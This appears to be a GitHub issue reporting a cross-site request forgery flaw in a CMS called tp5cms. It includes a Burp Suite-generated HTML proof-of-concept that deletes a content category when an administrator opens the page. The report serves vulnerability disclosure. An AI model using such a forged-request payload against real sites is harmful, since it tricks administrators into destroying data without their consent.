Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
I can delete category via catid when admin click the csrf html file.
CSRF HTML:
<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.2.129/tp5cms/admin.php/category/delete.html"> <input type="hidden" name="catid" value="4" /> <input type="submit" value="Submit request" /> </form> </body> </html>
The text was updated successfully, but these errors were encountered:
How to fix this issue?
Sorry, something went wrong.
No branches or pull requests
I can delete category via catid when admin click the csrf html file.
CSRF HTML:
The text was updated successfully, but these errors were encountered: